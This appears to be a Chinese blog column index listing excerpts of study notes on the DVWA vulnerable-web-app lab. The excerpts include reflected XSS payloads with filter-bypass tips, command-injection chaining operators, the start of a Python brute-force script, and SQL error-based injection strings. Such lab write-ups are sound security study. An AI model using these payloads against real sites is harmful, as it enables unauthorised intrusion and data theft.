
dvwa
好好学习不好吗?
这个作者很懒,什么都没留下…
展开
专栏收录文章
- 默认排序
- 最新发布
- 最早发布
- 最多阅读
- 最少阅读
-
大家好,我换博客了 嘻嘻
我的新博客原创 2019-11-15 09:54:24 · 212 阅读 · 0 评论 -
File Inclusion漏洞
File Inclusion 文件包含漏洞,是指服务器开启allow_url_include=on时,就可以通过php语言的某些特性函数(比如require()、include()等等)利用url去包含文件,此时如果没有对文件来源进行审查,就会导致任意文件读取或者任意命令执行。文件包含漏洞分为本地文件包含漏洞与远程文件包含漏洞 远程文件包含漏洞是由于allow_url_fopen=on(开启时),...原创 2019-11-04 23:32:21 · 487 阅读 · 0 评论 -
dvwa xss(reflected)
xss(reflected) low <script>alert(''xss)</script> medium 过滤不严谨 可以采用双写或者大小写混合绕过 high 虽然无法使用输入 <img src=1 onerror=alert(/xss/)> ...原创 2019-11-03 19:10:27 · 264 阅读 · 0 评论 -
dvwa command injection 学习
#dvwa command injection 学习 low 命令执行漏洞的产生原因一般就是将用户输入未经过滤或者过滤不严就直接当作系统命令进行执行,我们可以通过批处理中的一些技巧来一次执行多条命令,这样就可以执行任意命令。在命令执行中,常用的命令连接符号有四个:&& & || | ; &&:前一个指令执行成功,后面的指令才继续执行,就像进行与操作一样 ||...原创 2019-11-02 21:22:45 · 185 阅读 · 0 评论 -
DVWA SECURITY LEVEL HIGH (python3 brute force)
import requests from bs4 import BeautifulSoup def getToken(url,header): try: r = requests.get(url,headers=header) print ('响应码:',r.status_code) print ('响应包长度:',len(r.text)) r.raise_for_status(...原创 2019-11-02 19:10:29 · 236 阅读 · 0 评论 -
dvwa-brute force (low........)(采用sql报错注入进行解题)
admin’ and extractvalue(1,concat(’~’,(select user()),’~’))# '~root@localhost~' admin’ and extractvalue(1,concat(’~’,(select database()),’~’))# '~dvwa~' admin’ and extractvalue(1,concat(’~’,(select c...原创 2019-11-01 22:32:52 · 325 阅读 · 0 评论